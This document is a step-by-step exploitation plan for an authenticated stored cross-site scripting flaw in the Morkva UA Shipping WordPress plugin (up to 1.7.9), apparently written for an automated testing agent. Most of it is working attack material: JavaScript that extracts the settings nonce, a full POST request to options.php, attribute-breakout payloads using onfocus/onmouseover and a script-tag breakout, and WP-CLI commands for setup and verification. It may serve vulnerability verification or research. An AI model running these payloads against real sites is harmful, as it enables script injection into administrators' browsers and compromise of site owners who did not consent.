Morkva UA Shipping <= 1.7.9 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Weight, kg' Field

This plan outlines the steps to exploit a stored Cross-Site Scripting (XSS) vulnerability in the Morkva UA Shipping plugin (<= 1.7.9). The vulnerability exists because the plugin fails to sanitize and escape the "Weight, kg" field within its administrative settings.

1. Vulnerability Summary

• Vulnerability: Authenticated Stored XSS.
• Affected Parameter: Any numeric setting field (specifically "Weight, kg") rendered via the MRKV_UA_SHIPPING_OPTION_FILEDS::get_input_number method.
• Vulnerable Sink: classes/settings/global/mrkv-ua-shipping-option-fields.php in the get_input_number() function.
• Cause: The $value_content variable (derived from user-controlled settings) is echoed directly into the value attribute of an <input type="number"> tag without using esc_attr(). This allows an attacker to break out of the attribute and inject event handlers or other attributes.

2. Attack Vector Analysis

• Endpoint: /wp-admin/options.php (standard WordPress settings handler).
• Vulnerable Page: /wp-admin/admin.php?page=mrkv_ua_shipping_nova-poshta (or other shipping method sub-pages like ukr-poshta).
• Required Authentication: Administrator permissions (specifically when unfiltered_html is disabled).
• Payload Location: The nova-poshta_m_ua_settings[default][weight] parameter (field name inferred from plugin logic).

3. Code Flow

1. Entry Point: An administrator saves plugin settings via the WordPress Admin UI.
2. Storage: The settings are saved as an array in the wp_options table under the name nova-poshta_m_ua_settings.
3. Loading: When the settings page is loaded, MRKV_UA_SHIPPING_METHODS::get_shipping_admin_settings (in classes/shipping_methods/mrkv-ua-shipping-methods.php) retrieves the option:

   define('MRKV_OPTION_OBJECT_NAME', SETTINGS_MRKV_UA_SHIPPING_SLUG . '_m_ua_settings');
   define('MRKV_SHIPPING_SETTINGS', get_option(MRKV_OPTION_OBJECT_NAME));
   

4. Sink: The settings page calls get_input_number() in classes/settings/global/mrkv-ua-shipping-option-fields.php:

   public function get_input_number($label, $name, $value = '', ...) {
       $value_content = $value ? $value : $default_value; // No sanitization
       // Value is echoed directly into attribute
       $name_content = $name ? '<input ... name="' . $name . '" ... value="' . $value_content . '" ' . $readonly . '>' : '';
       return $html;
   }
   

4. Nonce Acquisition Strategy

The settings are saved using the standard WordPress Options API.

1. Navigate to the settings page: wp-admin/admin.php?page=mrkv_ua_shipping_nova-poshta.
2. The form on this page will contain a hidden input for _wpnonce.
3. The nonce action is automatically generated by WordPress for the settings group mrkv-ua-shipping-nova-poshta-group.
4. Extraction:

   // Use browser_eval to get the nonce from the form
   document.querySelector('form[action="options.php"] input[name="_wpnonce"]').value;
   

5. Exploitation Strategy

1. Pre-requisite: The Nova Poshta shipping method must be enabled.
2. Navigation: Navigate to the Nova Poshta settings page.
3. Extraction: Grab the _wpnonce and the exact name attribute of the "Weight, kg" input.
4. Injection: Send a POST request to options.php with the XSS payload.
5. Payload: 0" onmouseover="alert(document.domain)" style="width:1000px;height:1000px;display:block;"
   • Note: Since it's a type="number", the browser might visually restrict input, but the server-side storage accepts the string. Injecting a large style ensures the onmouseover is easily triggered. Alternatively, use 0" autofocus onfocus="alert(1)".

HTTP Request (Example):

POST /wp-admin/options.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

option_page=mrkv-ua-shipping-nova-poshta-group&
action=update&
_wpnonce=[EXTRACTED_NONCE]&
nova-poshta_m_ua_settings[default][weight]=0" autofocus onfocus="alert(document.domain)"

6. Test Data Setup

1. Activate Plugin: Ensure morkva-ua-shipping is active.
2. Enable Method: Use WP-CLI to enable Nova Poshta to ensure the settings page is accessible.

   wp option update m_ua_active_plugins '{"nova-poshta":{"enabled":"on"}}' --format=json
   

3. Administrator User: Use the existing admin credentials.

7. Expected Results

• The POST request to options.php should return a 302 redirect back to the settings page.
• Upon redirection (or manual reload), the HTML source of the "Weight, kg" input will look like:

  <input ... type="number" ... value="0" autofocus onfocus="alert(document.domain)" ">
  

• The JavaScript payload will execute automatically (due to autofocus/onfocus) or upon hovering.

8. Verification Steps

1. Check Database: Verify the payload is stored in the options table.

   wp option get nova-poshta_m_ua_settings --format=json
   

2. Verify Rendering: Use http_request to fetch the settings page and grep for the payload.

   # Look for the injected onfocus handler
   grep "onfocus=\"alert"
   

9. Alternative Approaches

• Different Shipping Methods: If nova-poshta is not the target, the same vulnerability exists in ukr-poshta or rozetka-delivery settings pages, as they all use the same MRKV_UA_SHIPPING_OPTION_FILEDS generator.
• Bypassing type="number": If the browser refuses to render event handlers on a numeric input, an attacker can attempt to inject a type="text" attribute. While browsers usually prioritize the first type attribute, some older environments or specific rendering contexts might be susceptible to attribute overwriting or breaking the tag entirely ("><script>...).